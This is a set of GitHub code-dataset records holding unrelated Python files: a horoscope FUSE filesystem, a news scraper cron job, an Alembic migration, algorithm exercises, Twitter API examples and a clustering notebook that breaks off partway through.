deleted.\n with tempfile.TemporaryDirectory() as tmp_dir:\n self.stat_dict_dir = \\\n self._convert_stat_to_dict(os.lstat(tmp_dir))\n\n with tempfile.NamedTemporaryFile() as tmp_file:\n self.stat_dict_file = \\\n self._convert_stat_to_dict(os.lstat(tmp_file.name))\n\n self.sunsign = sunsign\n self.moonsign = moonsign\n self.dot_dirs = ['.', '..']\n self.current_module = sys.modules[__name__]\n self.horoscope_objs = {}\n\n\n # Given a 'stat_result' object, convert it into a Python dictionary.\n def _convert_stat_to_dict(self, stat_result):\n stat_keys = ('st_atime', 'st_ctime', 'st_gid', 'st_mode',\n 'st_mtime', 'st_nlink', 'st_size', 'st_uid')\n\n return dict((key, getattr(stat_result, key)) for key in stat_keys)\n\n\n # Create an object on-demand for the horoscope site we are looking at\n # if the object has not already been created.\n def _construct_obj_from_path(self, path):\n horoscope_site, _ = path.split(os.sep)[1:3]\n if not self.horoscope_objs.get(horoscope_site, None):\n obj = getattr(self.current_module, horoscope_site)(self.sunsign, self.moonsign)\n self.horoscope_objs[horoscope_site] = obj\n\n\n # Get the size of the file corresponding to the given path.\n # Path is a string of the form //\n def _get_file_size_from_path(self, path):\n horoscope_site, horoscope_type = path.split(os.sep)[1:3]\n horoscope_obj = self.horoscope_objs[horoscope_site]\n return len(horoscope_obj.horoscope[horoscope_type])\n\n\n # Read data from the given file path.\n # Path is a string of the form //\n def _read_data_from_path(self, path, length, offset):\n horoscope_site, horoscope_type = path.split(os.sep)[1:3]\n horoscope_obj = self.horoscope_objs[horoscope_site]\n return horoscope_obj.horoscope[horoscope_type][offset : offset+length]\n\n\n def getattr(self, path, fh=None):\n if any(map(path.endswith, horoscope_sites)):\n # For directories corresponding to the horoscope websites,\n # return the default stats for directory.\n return self.stat_dict_dir\n elif any(map(path.endswith, horoscope_types)):\n # Fetch content from the horoscope site we are looking at on-demand.\n self._construct_obj_from_path(path)\n\n # For files corresponding to the horoscope types,\n # return the stats for the file with st_size set appropriately.\n stat = dict(self.stat_dict_file) # Create a copy before modifying\n stat['st_size'] = self._get_file_size_from_path(path)\n return stat\n else:\n # For all other files/directories, return the stats from the OS.\n return self._convert_stat_to_dict(os.lstat(path))\n\n\n def readdir(self, path, fh):\n if any(map(path.endswith, horoscope_sites)):\n # Each horoscope website directory contains one file for each\n # horoscope type.\n return self.dot_dirs + horoscope_types\n else:\n # Top level directory (mountpoint) contains one directory for each\n # horoscope website.\n return self.dot_dirs + horoscope_sites\n\n\n def read(self, path, length, offset, fh):\n return self._read_data_from_path(path, length, offset)\n\n\ndef main(mountpoint, sunsign, moonsign):\n fuse.FUSE(HoroscopeFS(sunsign, moonsign),\n mountpoint,\n nothreads=True,\n foreground=True)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"mountpoint\", help=\"Mount point for the Virtual File System\")\n parser.add_argument(\"sunsign\", help=\"Your sun sign\")\n parser.add_argument(\"moonsign\", help=\"Your moon sign\")\n args = parser.parse_args()\n\n main(args.mountpoint, args.sunsign.lower(), args.moonsign.lower())\n","repo_name":"varunbpatil/HoroscopeFS","sub_path":"horoscopeFS.py","file_name":"horoscopeFS.py","file_ext":"py","file_size_in_byte":8840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26471392227","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom django_cron import CronJobBase, Schedule\n\nfrom crawler.models import Article\n\n\nclass CrawlerCronJob(CronJobBase):\n RUN_EVERY_MIN = 10\n\n schedule = Schedule(run_every_mins=RUN_EVERY_MIN)\n code = 'crawler.jobs.crawler_cron_job'\n\n @staticmethod\n def do():\n page = BeautifulSoup(requests.get(\"https://www.lindaikejisblog.com/\").text, 'html.parser')\n html_articles = page.select(\".main_board article\")\n html_articles.reverse()\n\n for html_article in html_articles:\n title = html_article.select(\".story_title a\")[0].text.strip()\n url = html_article.select(\".story_title a\")[0].get('href')\n image_url = html_article.select(\"img\")[0].get('src')\n snippet = html_article.select(\".story_description\")[0].text.strip()\n\n if not Article.objects.filter(url=url).exists():\n article = Article(title=title, url=url, image_url=image_url, snippet=snippet)\n try:\n article.save()\n except Exception as e:\n print(e)\n","repo_name":"acefalobi/linda-crawler-api","sub_path":"src/crawler/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11684553695","text":"\"\"\"add nodes and egdes for graphs with missing nodes/edges in database\n\nSome of the graphs dont have respective nodes and edges in the edges table. This script will create node and edges in the respective node/edges table.\n\nRevision ID: 7df7ee83a212\nRevises: c4c8fd40b021\nCreate Date: 2017-03-10 10:54:51.546356\n\n\"\"\"\nimport json\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n# revision identifiers, used by Alembic.\nfrom graphspace_python.graphs.formatter.json_formatter import CyJSFormat\n\nrevision = '7df7ee83a212'\ndown_revision = 'c4c8fd40b021'\nbranch_labels = None\ndepends_on = None\n\ngraphhelper = sa.Table(\n\t'graph',\n\tsa.MetaData(),\n\tsa.Column('id', sa.Integer, primary_key=True),\n\tsa.Column('graph_json', sa.String)\n)\n\nnodehelper = sa.Table(\n\t'node',\n\tsa.MetaData(),\n\tsa.Column('id', sa.Integer, primary_key=True),\n\tsa.Column('label', sa.String),\n\tsa.Column('name', sa.String),\n\tsa.Column('graph_id', sa.Integer),\n)\n\nedgehelper = sa.Table(\n\t'edge',\n\tsa.MetaData(),\n\tsa.Column('id', sa.Integer, primary_key=True),\n\tsa.Column('name', sa.String),\n\tsa.Column('head_node_id', sa.Integer),\n\tsa.Column('tail_node_id', sa.Integer),\n\tsa.Column('tail_node_name', sa.String),\n\tsa.Column('head_node_name', sa.String),\n\tsa.Column('tail_node_label', sa.String),\n\tsa.Column('head_node_label', sa.String),\n\tsa.Column('graph_id', sa.Integer),\n\tsa.Column('is_directed', sa.Integer),\n)\n\n\ndef add_node(connection, name, label, graph_id):\n\tres = connection.execute(nodehelper.insert().values(name=name, label=label, graph_id=graph_id))\n\tnode_id = res.inserted_primary_key\n\tfor node in connection.execute(nodehelper.select().where(nodehelper.c.id==node_id[0])):\n\t\treturn node.id, node.name, node.label\n\n\ndef add_graph_nodes(connection, graph_id, nodes):\n\tnode_name_to_id_map = dict()\n\tnode_id_to_label_map = dict()\n\n\tfor node in nodes:\n\t\t# Add node to table\n\t\tid, name, label = add_node(connection, name=node[0], label=node[1]['data']['label'], graph_id=graph_id)\n\t\tnode_name_to_id_map[name] = id\n\t\tnode_id_to_label_map[id] = label\n\treturn node_name_to_id_map, node_id_to_label_map\n\n\ndef add_edge(connection, name, head_node_id, tail_node_id, tail_node_name, head_node_name, tail_node_label,\n head_node_label, is_directed, graph_id):\n\tconnection.execute(edgehelper.insert().values(\n\t\tname=name,\n\t\thead_node_id=head_node_id,\n\t\ttail_node_id=tail_node_id,\n\t\ttail_node_name=tail_node_name,\n\t\thead_node_name=head_node_name,\n\t\ttail_node_label=tail_node_label,\n\t\thead_node_label=head_node_label,\n\t\tis_directed=is_directed,\n\t\tgraph_id=graph_id))\n\n\ndef add_graph_edges(connection, graph_id, edges, node_name_to_id_map, node_id_to_label_map):\n\tedge_name_to_id_map = dict()\n\tfor edge in edges:\n\t\tis_directed = 0 if 'is_directed' not in edge[2]['data'] else 1 if edge[2]['data']['is_directed'] else 0\n\n\t\t# To make sure int and floats are also accepted as source and target nodes of an edge\n\t\tadd_edge(connection,\n\t\t graph_id=graph_id,\n\t\t head_node_id=str(node_name_to_id_map[edge[1]]),\n\t\t tail_node_id=str(node_name_to_id_map[edge[0]]),\n\t\t head_node_name=str(edge[1]),\n\t\t tail_node_name=str(edge[0]),\n\t\t head_node_label=str(node_id_to_label_map[node_name_to_id_map[edge[1]]]),\n\t\t tail_node_label=str(node_id_to_label_map[node_name_to_id_map[edge[0]]]),\n\t\t name=str(edge[2]['data']['name']),\n\t\t is_directed=is_directed)\n\n\ndef upgrade():\n\tconnection = op.get_bind()\n\tgraph_ids = set()\n\n\tfor graph in connection.execute(graphhelper.select().distinct(graphhelper.c.id)):\n\t\tgraph_ids.add(graph.id)\n\n\tgraphs_with_elements = set()\n\n\tfor node in connection.execute(nodehelper.select().distinct(nodehelper.c.graph_id)):\n\t\tgraphs_with_elements.add(node.graph_id)\n\n\tgraph_ids.difference_update(graphs_with_elements)\n\n\tfor edge in connection.execute(edgehelper.select().distinct(edgehelper.c.graph_id)):\n\t\tgraphs_with_elements.add(edge.graph_id)\n\n\tgraph_ids.difference_update(graphs_with_elements)\n\n\tfor graph in connection.execute(graphhelper.select().where(graphhelper.c.id.in_(graph_ids))):\n\t\tprint(graph.id)\n\t\tG = CyJSFormat.create_gsgraph(graph.graph_json)\n\t\t# Add graph nodes\n\t\tnode_name_to_id_map, node_id_to_label_map = add_graph_nodes(connection, graph.id, G.nodes(data=True))\n\t\t# Add graph edges\n\t\tedge_name_to_id_map = add_graph_edges(connection, graph.id, G.edges(data=True), node_name_to_id_map,\n\t\t node_id_to_label_map)\n\n\ndef downgrade():\n\tpass\n","repo_name":"Murali-group/GraphSpace","sub_path":"migration/versions/7df7ee83a212_add_nodes_and_egdes_for_graphs_with_.py","file_name":"7df7ee83a212_add_nodes_and_egdes_for_graphs_with_.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"32"} +{"seq_id":"19780135502","text":"def solution(n, edge):\n from collections import defaultdict\n\n #defulatdict를 사용하면 정렬하는 시간이 필요 없어짐\n li = defaultdict(list)\n\n #양방향으로 에지를 가짐\n for i in edge:\n li[i[0]].append(i[1])\n li[i[1]].append(i[0])\n\n search = [1] #시작을 1에서 부터 시작함\n check=[0 for i in range(n+1)] #간선이 몇개 존재하는지 관리하는 배열\n check[1]=1 #첫번째노드를 체크하지 못하게 설정\n\n for i in search:\n for j in li[i]:\n\n #탐색하지 않은 노드일 경우 직전 노드의 간선 + 1\n #j not in search로 했었을때 탐색 횟수가 너무 커져서 시간초과(최대 간선 수 50000)\n if check[j]==0:\n search.append(j)\n check[j] = check[i] + 1\n\n #간선수가 가장 많은 노드의 수를 구함\n return check.count(max(check))\n","repo_name":"YAEJIN-JEONG/Algorithm","sub_path":"프로그래머스/Lv3. 가장 먼 노드/동혁/Lv3. 가장 먼 노드.py","file_name":"Lv3. 가장 먼 노드.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"18004302501","text":"# https://leetcode.com/problems/pascals-triangle-ii/\n\nclass Solution(object):\n def getRow(self, rowIndex):\n \"\"\"\n :type rowIndex: int\n :rtype: List[int]\n \"\"\"\n if rowIndex == 0:\n return [1]\n res = [1,1]\n for i in range(rowIndex-1):\n left, right = 0, 0\n while right < len(res):\n left, res[right] = res[right], res[right] + left\n print(res)\n right+=1\n res.append(1)\n return res","repo_name":"Shubratha/practice","sub_path":"Misc/pasals.py","file_name":"pasals.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13169656869","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\nFile Name: 3. buildTree\nDescription : \nAuthor : wellqin\ndate: 2020/3/19\nChange Activity: 2020/3/19\n[105] Construct Binary Tree from Preorder and Inorder Traversal:先序和中序遍历可以唯一确定一棵二叉树\n[106] Construct Binary Tree from Inorder and Postorder Traversal:中序和后序遍历可以唯一确定一棵二叉树\n[606] Construct String from Binary Tree:根据二叉树构建字符串\n-------------------------------------------------\n\"\"\"\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\n\"\"\"\n一句话,看到树🌲就要想到递归\n\npreorder 是 根 -> 左 -> 右\ninorder 是 左 -> 根 -> 右\n首先pre的第一个就是整个树的root, 假设 preorder[0] = inorder[k],那么inorder的前k-1个就是树的左子树,后面部分就是树的右子树\n\"\"\"\n\n\nclass Solution(object):\n def buildTree(self, preorder, inorder):\n \"\"\"\n :type preorder: List[int]\n :type inorder: List[int]\n :rtype: TreeNode\n \"\"\"\n if not preorder or len(preorder) == 0:\n return None\n\n root = TreeNode(preorder[0])\n k = inorder.index(preorder[0]) # inorder中的root位置\n\n root.left = self.buildTree(preorder[1:k + 1], inorder[0:k])\n root.right = self.buildTree(preorder[k + 1:], inorder[k + 1:])\n return root\n\n\n \"\"\"\n inorder 是 左 -> 根 -> 右\n postorder是 根 -> 左 -> 右\n \"\"\"\n\n def buildTree1(self, inorder, postorder):\n \"\"\"\n :type inorder: List[int]\n :type postorder: List[int]\n :rtype: TreeNode\n \"\"\"\n if not inorder or len(inorder) == 0:\n return None\n root = TreeNode(postorder[-1])\n k = inorder.index(postorder[-1]) # # inorder中的root位置\n\n root.left = self.buildTree(inorder[:k], postorder[:k])\n root.right = self.buildTree(inorder[k + 1:], postorder[k:-1])\n return root\n\n def tree2str(self, t: TreeNode) -> str:\n result = '' # 外部函数中变量声明为global\n\n def Helper(root):\n nonlocal result # nonlocal只能在封装函数中使用,在外部函数先进行声明,在内部函数进行nonlocal声明\n if not root:\n return None\n left = Helper(root.left)\n right = Helper(root.right)\n\n if left and right:\n result = str(root.val) + '(' + str(left) + ')' + '(' + str(right) + ')'\n elif not left and right:\n result = str(root.val) + '()' + '(' + str(right) + ')'\n elif left and not right:\n result = str(root.val) + '(' + str(left) + ')'\n else:\n result = str(root.val)\n return result\n\n Helper(t)\n return result\n\n","repo_name":"wellqin/USTC","sub_path":"DataStructure/二叉树/LT-problem/4.buildTree.py","file_name":"4.buildTree.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"38564927534","text":"'''\n所有的矩阵相乘都可以拆分成小矩阵相乘,我们的任务就是寻找出最小的代价\n使得矩阵相乘的花销最小。\nAi表示第i个矩阵\nAi = p(i-1)*pi\n在划分子问题的时候,一个长度为n的矩阵,一定是由两个长度为i, j 的矩阵链计算得出\n其中,这两个矩阵链满足,i+j = n,该矩阵链一定是最小的代价的矩阵链。\n\n那么,极端情况为:\n1. 当矩阵链长度为1 时(自身)时,花销为0\n 要考虑的初始情况为,从矩阵链长度为2 开始,到长度为 n 的花销情况。\n2. 假设一个长度为 L 的矩阵链,它的代价开销可理解为\n 开始位置 i,结束位置 j,以及中间的最佳分隔点 k\n 因此有:\n m[i, j] = m[i, k] + m[k+1, j] + pi*pk*pj\n (m一个矩阵,用来存放两点之间的代价,p矩阵的行)\n'''\n\nNULLFLAG = float('inf')\n\ndef MatrixChainOrder(matrix):\n matrixNum = len(matrix)\n cost = []\n bestShot = []\n for i in range(matrixNum):\n cost.append([0] * matrixNum)\n bestShot.append([0] * matrixNum)\n\n # ccl:current chain length:当前寻找最小代价的矩阵链的长度\n for ccl in range(2, matrixNum+1):\n # i 代表目前ccl中的起始矩阵,起始位从第1个矩阵开始,到matrixNum-ccl+1\n for i in range(matrixNum-ccl+1):\n # 定义结束位置 j\n j = i + ccl - 1\n cost[i][j] = NULLFLAG\n # 定义最佳中间分割点k的位置\n for k in range(i, j):\n tempCost = cost[i][k] + cost[k+1][j] + matrix[i][0] * matrix[k][1] * matrix[j][1]\n\n if tempCost < cost[i][j]:\n cost[i][j] = tempCost\n bestShot[i][j] = k\n return cost, bestShot\n\ndef printParens(bestShot, i, j):\n if i == j:\n print(\"A\", i, end=\"\")\n else:\n print(\"(\", end='')\n k = bestShot[i][j]\n printParens(bestShot, i, k)\n printParens(bestShot, k+1, j)\n print(\")\", end='')\n\n\nif __name__ == '__main__':\n Matrix = [\n [30, 35],\n [35, 15],\n [15, 5],\n [5, 10],\n [10, 20],\n [20, 25],\n ]\n cost, bestShot = MatrixChainOrder(Matrix)\n print(cost)\n print(bestShot)\n\n printParens(bestShot, 0, 5)\n\n\n","repo_name":"whisperH/AlgorithmsAndMeachineLearning","sub_path":"DynamicProgramming/MutiplyMatrix.py","file_name":"MutiplyMatrix.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"6796000461","text":"import sqlite3\r\nimport xml.etree.ElementTree as ET\r\n\r\n# Conectarse a la base de datos\r\nconn = sqlite3.connect('C:/sdk/Sqlite/prueba.db')\r\n\r\n# Crear cursor\r\nc = conn.cursor()\r\n\r\n# Consultar los goles de cada equipo como local y visitante\r\nc.execute('SELECT EquipoLocal, SUM(golesLocal) FROM partidos GROUP BY EquipoLocal')\r\ngoles_local = dict(c.fetchall())\r\nc.execute('SELECT EquipoVisitante, SUM(golesVisitante) FROM partidos GROUP BY EquipoVisitante')\r\ngoles_visitante = dict(c.fetchall())\r\n\r\n# Encontrar equipos que han metido más goles como visitante que como local\r\nequipos_visitante = [equipo for equipo in goles_visitante.keys() if equipo in goles_local.keys() and goles_visitante[equipo] > goles_local[equipo]]\r\n\r\n# Crear el elemento raíz del archivo XML\r\nroot = ET.Element('resultados')\r\n\r\n# Crear elementos y añadirlos al árbol si hay equipos visitantes\r\nif len(equipos_visitante) > 0:\r\n for equipo in equipos_visitante:\r\n resultado = ET.SubElement(root, 'resultado')\r\n resultado.set('equipo', equipo)\r\n resultado.set('visitante', 'si')\r\nelse:\r\n resultado = ET.SubElement(root, 'resultado')\r\n resultado.set('equipo', 'No hay equipos que hayan metido más goles como visitante que como local')\r\n \r\n# Escribir el archivo XML\r\ntree = ET.ElementTree(root)\r\ntree.write('equipos_visitante.xml')\r\n\r\n# Mostrar resultados\r\nif len(equipos_visitante) > 0:\r\n print('Los siguientes equipos han metido más goles como visitante que como local:')\r\n for equipo in equipos_visitante:\r\n print(f'- {equipo}')\r\nelse:\r\n print('No hay equipos que hayan metido más goles como visitante que como local')\r\n\r\n# Cerrar conexión\r\nconn.close()\r\n","repo_name":"MartaMolinaGutierrez/BBDDAA","sub_path":"XML2_/queries/query4.py","file_name":"query4.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73005162012","text":"# -*- coding: utf-8 -*-\n\"\"\"\nmodule author: Long Hao \n\"\"\"\n\n# Import built-in modules\nimport os\n\n# Import local modules\nfrom nukescripts_builder.core import build_nukescripts\n\n\ndef test_build_nukescripts(tmpdir):\n source_string = \"\"\"\nRead {\n inputs 0\n #if $getVar('file_type', ''):\n file_type $file_type\n #end if\n file $read_file\n origset true\n name Read1\n selected true\n xpos 54\n ypos -162\n}\nOCIOColorSpace {\n in_colorspace linear\n out_colorspace linear\n name OCIOColorSpace1\n selected true\n xpos 54\n ypos -47\n}\nWrite {\n file $write_file\n name Write1\n selected true\n xpos 54\n ypos -6\n }\n\"\"\"\n file_path = 'Y:/113803nya2022gg2pe65ka.jpg'\n write_file = 'c:/test.exr'\n output_path = str(tmpdir.join('test.nk'))\n build_nukescripts(template=source_string, output_path=output_path, data={\n 'read_file': file_path,\n 'write_file': write_file\n })\n assert os.path.isfile(output_path)\n with open(output_path, 'r') as file_obj:\n assert 'file {}'.format(file_path) in file_obj.read()\n assert 'file_type' not in file_obj.read()\n","repo_name":"loonghao/nukescripts_builder","sub_path":"nukescripts_builder/test/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"26889751790","text":"import requests\nimport tweepy\n\n\"\"\"\n#### v2 with Requests\nVersion 2 of the Twitter API has an updated set of endpoints and more functionalities.\n If you can get an API key in the Academic Research track, it allows you to search for tweets posted\n at any point in the past (no other method allows you to do that).\n It is more volume-restricted than v1.1 though.\n The standard track is limited to 0.5M tweets per month, the Elevated track to 2M per month,\nand the Academic Research track is limited to 10M per month.\n\n\"\"\"\n\n# API v2 endpoint for recent tweets search\nendpoint_url = 'https://api.twitter.com/2/tweets/search/recent'\n\n# authentication-->\nheaders = {'Authorization': f'Bearer {bearer_token}'}\n\n# API v2 allows you to specify the fields to be returned\ntweet_fields = ['author_id', 'created_at', 'id', 'text', 'withheld']\ntweet_fields = ','.join(tweet_fields)\nuser_fields = ['created_at', 'description', 'id', 'location', 'name', 'username']\nuser_fields = ','.join(user_fields)\n\nquery = 'ukraine'\nquery_params = {'query': query,\n 'tweet.fields': tweet_fields,\n 'user.fields' : user_fields,\n 'max_results': 10,\n }\nresponse = requests.request('GET', endpoint_url, headers=headers, params=query_params)\nresponse.json()['data']\n\n\n\n###### v2 with Tweepy####\n\nclass MyStreamV2(tweepy.StreamingClient):\n def on_data(self, data):\n print(data)\n\nstream = MyStreamV2(bearer_token)\nstream.sample()\n","repo_name":"ResitKadir1/03_APIs","sub_path":"Twitter_api2.py","file_name":"Twitter_api2.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37528395215","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.cluster.hierarchy as sch\nfrom sklearn.cluster import AgglomerativeClustering\n\n\n# In[4]:\n\n\ndata=pd.read_excel('EastWestAirlines.xlsx',sheet_name='data')\n\n\n# In[5]:\n\n\ndata\n\n\n# In[7]:\n\n\ndata.info()\n\n\n# In[8]:\n\n\ndata.isna().sum()\n\n\n# In[9]:\n\n\n# Checking for all the values in dataset of type integer, if not replacing them with nan\ndef check_int(df):\n count = 0\n for row in df:\n try:\n if type(row) != int:\n df.loc[count] = np.nan\n except:\n pass\n count +=1\n\n\n# In[12]:\n\n\ncheck_int(data[data.columns])\n\n\n# In[14]:\n\n\ndata.describe().transpose()\n\n\n# In[21]:\n\n\n# Checking previously awarded miles ratio\ndata['Award?'].value_counts().plot(kind='pie', autopct='%2.0f%%', fontsize='18', \n colors = ['#F11A05','#43E206'], shadow =True)\nplt.show()\n\n\n# In[22]:\n\n\n# Checking relation between Balance and Days_since_enroll\nimport seaborn as sns\nfig, ax =plt.subplots(figsize=(40,12))\nax = sns.lineplot(x= 'Days_since_enroll', y='Balance',data = data)\n\n\n# In[20]:\n\n\n# Agglomerative Clustering\ndata1 = data.drop('ID#', axis = 1)\ndata1.head()\n\n\n# In[24]:\n\n\n# import libraries\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler\n\n\n# In[25]:\n\n\n\n\n# We will check clustering for two different scaling functions\nscaler1 = MinMaxScaler()\nscaler2 = MinMaxScaler()\n\n\n# In[26]:\n\n\n# Normalizing Dataset\nscaler1_df = scaler1.fit_transform(data1)\nprint(scaler1_df)\nprint('\\n')\nscaler2_df = scaler2.fit_transform(data1)\nprint(scaler2_df)\n\n\n# In[27]:\n\n\n# Create Dendrograms\nplt.figure(figsize=(10, 7)) \ndendograms=sch.dendrogram(sch.linkage(scaler1_df,'complete'))\n\n\n# In[28]:\n\n\n# Creating clusters\nH_clusters=AgglomerativeClustering(n_clusters=5,affinity='euclidean',linkage='ward')\nH_clusters\n\n\n# In[29]:\n\n\n\n# Using data normalized by MinMaxScaler \ny=pd.DataFrame(H_clusters.fit_predict(scaler1_df),columns=['clustersid'])\ny['clustersid'].value_counts()\n\n\n# In[31]:\n\n\n# Adding clusters to dataset\ndata['clustersid_s1']=H_clusters.labels_\ndata\n\n\n# In[32]:\n\n\ndata1['clustersid_s1']=H_clusters.labels_\n\n\n# In[35]:\n\n\n\n# Plotting barplot using groupby method to get visualization of how many row no. in each cluster\nfig, ax = plt.subplots(figsize=(10, 6))\ndata.groupby(['clustersid_s1']).count()['ID#'].plot(kind='bar')\nplt.ylabel('ID Counts')\nplt.title('Hierarchical Clustering',fontsize='large',fontweight='bold')\nax.set_xlabel('Clusters', fontsize='large', fontweight='bold')\nax.set_ylabel('ID#', fontsize='large', fontweight='bold')\nplt.yticks(fontsize=15)\nplt.xticks(fontsize=15)\nplt.show()\n\n\n# In[36]:\n\n\n# silhouette_score of AgglomerativeClustering\nfrom sklearn.metrics import silhouette_score\n\n\n# In[37]:\n\n\nsil_score= silhouette_score(scaler1_df, H_clusters.labels_)\nsil_score\n\n\n# In[38]:\n\n\ny=pd.DataFrame(H_clusters.fit_predict(scaler2_df),columns=['clustersid'])\ny['clustersid'].value_counts()\n\n\n# In[39]:\n\n\n# Adding clusters to dataset\ndata['clustersid_s2']=H_clusters.labels_\ndata1['clustersid_s2']=H_clusters.labels_\n\n\n# In[40]:\n\n\ndata\n\n\n# In[42]:\n\n\n# Plotting barplot using groupby method to get visualization of how many row no. in each cluster\nfig, ax = plt.subplots(figsize=(10, 6))\ndata.groupby(['clustersid_s2']).count()['ID#'].plot(kind='bar')\nplt.ylabel('ID Counts')\nplt.title('Hierarchical Clustering',fontsize='large',fontweight='bold')\nax.set_xlabel('Clusters', fontsize='large', fontweight='bold')\nax.set_ylabel('ID counts', fontsize='large', fontweight='bold')\nplt.yticks(fontsize=15)\nplt.xticks(fontsize=15)\nplt.show()\n\n\n# In[43]:\n\n\n# K-MEANS Clustering\nfrom sklearn.cluster import KMeans\n\n\n# In[44]:\n\n\nscaler1 = MinMaxScaler()\nscaler2 = StandardScaler()\n\n\n# In[48]:\n\n\n# Normalizing Dataset\nscaler1_df = scaler1.fit_transform(data1)\nprint(scaler1_df)\n\nprint('\\n')\n\nscaler2_df = scaler2.fit_transform(data1)\nprint(scaler2_df)\n\n\n# In[50]:\n\n\n# Using data normalized by MinMaxScaler\nwcss = []\nfor i in range(1, 11):\n kmeans = KMeans(n_clusters=i,random_state=0)\n kmeans.fit(scaler1_df)\n wcss.append(kmeans.inertia_)\n \nplt.plot(range(1, 11), wcss)\nplt.title('Elbow Method')\nplt.xlabel('Number of clusters')\nplt.ylabel('WCSS')\nplt.show()\n\n\n# In[51]:\n\n\n# Using data normalized by StandardScaler\nwcss = []\nfor i in range(1, 11):\n kmeans = KMeans(n_clusters=i,random_state=0)\n kmeans.fit(scaler2_df)\n wcss.append(kmeans.inertia_)\n \nplt.plot(range(1, 11), wcss)\nplt.title('Elbow Method')\nplt.xlabel('Number of clusters')\nplt.ylabel('WCSS')\nplt.show()\n\n\n# In[52]:\n\n\n#Build Cluster algorithm\n\n# Using data normalized by MinMaxScaler\nclusters_new1 = KMeans(5, random_state=42)\nclusters_new1.fit(scaler1_df)\n\n\n# In[53]:\n\n\nsil_score= silhouette_score(scaler1_df, clusters_new1.labels_)\nprint('Silhouette Score for data normalized by MinMaxScaler: ',sil_score)\n\n\n# In[54]:\n\n\n# Using data normalized by StandardScaler\nclusters_new2 = KMeans(5, random_state=42)\nclusters_new2.fit(scaler2_df)\n\n\n# In[55]:\n\n\n\nsil_score= silhouette_score(scaler2_df, clusters_new2.labels_)\nprint('Silhouette Score for data normalized by StandardScaler: ',sil_score)\n\n\n# In[56]:\n\n\n#Assign clusters to the data set\ndata['clusterid_Kmeans'] = clusters_new1.labels_\ndata1['clusterid_Kmeans'] = clusters_new1.labels_\n\n\n# In[57]:\n\n\n\ny=pd.DataFrame(clusters_new1.fit_predict(scaler1_df),columns=['clusterid_Kmeans'])\ny['clusterid_Kmeans'].value_counts()\n\n\n# In[59]:\n\n\n# Plotting barplot using groupby method to get visualization of how many row no. in each cluster\nfig, ax = plt.subplots(figsize=(10, 6))\ndata.groupby(['clusterid_Kmeans']).count()['ID#'].plot(kind='bar')\nplt.ylabel('ID Counts')\nplt.title('Hierarchical Clustering',fontsize='large',fontweight='bold')\nax.set_xlabel('Clusters', fontsize='large', fontweight='bold')\nax.set_ylabel('ID counts', fontsize='large', fontweight='bold')\nplt.yticks(fontsize=15)\nplt.xticks(fontsize=15)\nplt.show()\n\n\n# In[60]:\n\n\n\ndata1.groupby('clusterid_Kmeans').agg(['mean']).reset_index()\n\n\n# In[61]:\n\n\n# DBSCAN clustering\nfrom sklearn.cluster import DBSCAN\n\n\n# In[62]:\n\n\n# Using data normalized by MinMaxScaler\ndbscan = DBSCAN(eps=1, min_samples=12)\ndbscan.fit(scaler1_df)\n\n\n# In[63]:\n\n\n#Noisy samples are given the label -1.\ndbscan.labels_\n\n\n# In[64]:\n\n\ny=pd.DataFrame(dbscan.fit_predict(scaler1_df),columns=['clusterid_DBSCAN'])\ny['clusterid_DBSCAN'].value_counts()\n\n\n# In[65]:\n\n\n\n# silhouette score\nsil_score= silhouette_score(scaler1_df, dbscan.labels_)\nsil_score\n\n\n# In[71]:\n\n\n# Plotting barplot using groupby method to get visualization of how many row no. in each cluster\n# Plotting barplot using groupby method to get visualization of how many row no. in each cluster\nfig, ax = plt.subplots(figsize=(10, 6))\ndata.groupby(['clusterid_DBSCAN']).count()['ID#'].plot(kind='bar')\nplt.ylabel('ID Counts')\nplt.title('Hierarchical Clustering',fontsize='large',fontweight='bold')\nax.set_xlabel('Clusters', fontsize='large', fontweight='bold')\nax.set_ylabel('ID counts', fontsize='large', fontweight='bold')\nplt.yticks(fontsize=15)\nplt.xticks(fontsize=15)\nplt.show()\n\n\n# In[72]:\n\n\n# for epsilon = 0.8\ndbscan1 = DBSCAN(eps=0.8, min_samples=12)\ndbscan1.fit(scaler1_df)\n\n\n# In[73]:\n\n\ny=pd.DataFrame(dbscan1.fit_predict(scaler1_df),columns=['clusterid_DBSCAN'])\nprint(y['clusterid_DBSCAN'].value_counts())\n\n\n# In[74]:\n\n\n#silhouette score\nsil_score= silhouette_score(scaler1_df, dbscan1.labels_)\nprint('silhouette score: ',sil_score)\n\n\n# In[76]:\n\n\n\n# for epsilon = 0.6\ndbscan2 = 